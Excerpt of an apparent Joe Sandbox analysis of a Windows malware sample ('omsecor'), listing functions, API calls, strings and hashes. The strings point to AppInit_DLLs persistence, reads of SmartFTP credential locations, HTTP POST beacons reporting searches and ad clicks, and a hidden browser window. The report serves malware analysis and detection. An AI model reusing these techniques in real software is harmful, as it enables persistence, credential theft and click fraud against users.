Strings

d, xrefs: 0040ADB6
job^rev=%s^os=%s, xrefs: 0040ACDB
0, xrefs: 0040AD12
hOA, xrefs: 0040ACC0
^rcn=1, xrefs: 0040AD37

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$AttemptConnectInternet
String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
API String ID: 362191241-2593661552
Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B

Function 0040D790 Relevance: 10.8, APIs: 7, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0040D892
__FindPESection.LIBCMT ref: 0040D8AC

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D

Function 00408825 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004088E4
SysFreeString.OLEAUT32(?), ref: 004088E9
SysFreeString.OLEAUT32(?), ref: 004089D3
SysFreeString.OLEAUT32(?), ref: 004089D8
SysFreeString.OLEAUT32(?), ref: 004089F3

Strings

+@, xrefs: 0040884C

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID: +@
API String ID: 3341692771-3835504741
Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59

Function 0040253C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113sleepprocessfileCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

_memset.LIBCMT ref: 004025DA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D

Strings

none, xrefs: 00402614

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
String ID: none
API String ID: 2353737338-2140143823
Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE

Function 004094B6 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094E6

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84

Function 0040A245 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A26B
SysAllocString.OLEAUT32(?), ref: 0040A28E
SysAllocString.OLEAUT32(?), ref: 0040A296
SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
SysFreeString.OLEAUT32(?), ref: 0040A2CF

Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009

Strings

J(@, xrefs: 0040A29E, 0040A2A1

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
String ID: J(@
API String ID: 3143865713-2848800318
Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4

Function 00408604 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
GetLastError.KERNEL32(?,00000000), ref: 0040864A

Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

Strings

C:\WINDOWS\system32\gbdwpbm.dll, xrefs: 00408682
AppInit_DLLs, xrefs: 00408639, 00408671
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00408619, 0040861E, 00408676

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
API String ID: 4026185228-3265104503
Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD

Function 00409A99 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409B00
SysAllocString.OLEAUT32(?), ref: 00409B0E

Strings

</title>, xrefs: 00409AA7
<url>, xrefs: 00409AD1
<title>, xrefs: 00409AAC
</url>, xrefs: 00409ACC

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: </title>$</url>$<title>$<url>
API String ID: 2525500382-2286408829
Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4

Function 0040A8F9 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 161sleepmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
Sleep.KERNEL32(00002710), ref: 0040AAC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
HeapFree.KERNEL32(00000000), ref: 0040AAF0

Strings

0, xrefs: 0040AA5B
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: HeapSleep$AttemptConnectFreeInternetProcess
String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
API String ID: 3713053250-1268808612
Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA

Function 00407499 Relevance: 9.1, APIs: 6, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?), ref: 004074AD
GetLocalTime.KERNEL32(00000000), ref: 004074B3
GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
String ID:
API String ID: 3777474486-0
Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5

Function 004083C4 Relevance: 9.1, APIs: 6, Instructions: 61filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
CloseHandle.KERNEL32(?), ref: 00408452

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28

Function 00409DF4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00

Strings

POST, xrefs: 00409EBD

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: HttpInternetRequest$ConnectFileOpenReadSend
String ID: POST
API String ID: 961146071-1814004025
Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8

Function 00405136 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB

Strings

personal favorites, xrefs: 00405176
folder, xrefs: 00405184
SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: EnvironmentExpandOpenStrings
String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
API String ID: 3923277744-821743658
Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9

Function 0040A0B5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040A0C0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

AtlAxWin, xrefs: 0040A0ED
Shell.Explorer, xrefs: 0040A0E8

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CreateHandleInitializeModuleWindow
String ID: AtlAxWin$Shell.Explorer
API String ID: 950422046-1300462704
Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65

Function 00407267 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
__aulldiv.LIBCMT ref: 004072E3

Strings

c{@, xrefs: 004072D3

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: c{@
API String ID: 3735792614-264719814
Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5

Function 004072ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
__aulldiv.LIBCMT ref: 00407359

Strings

n(@, xrefs: 0040734C, 00407357

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: n(@
API String ID: 3735792614-2525614082
Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9

Function 0040AB7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
CharLowerW.USER32(?), ref: 0040ABA0
GetCommandLineW.KERNEL32 ref: 0040ABC0

Strings

/updatefile3, xrefs: 0040ABC6
netprotdrvss.exe, xrefs: 0040ABA6

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CharCommandFileLineLowerModuleName
String ID: /updatefile3$netprotdrvss.exe
API String ID: 3118597399-3449771660
Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D

Function 00409FB1 Relevance: 7.6, APIs: 5, Instructions: 53windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409FCE
GetTickCount.KERNEL32 ref: 00409FDE
Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
DispatchMessageW.USER32(?), ref: 0040A009

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A

Function 00409F2B Relevance: 7.5, APIs: 5, Instructions: 40windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409F5B
GetTickCount.KERNEL32 ref: 00409F5F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
DispatchMessageW.USER32(?), ref: 00409F80
Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
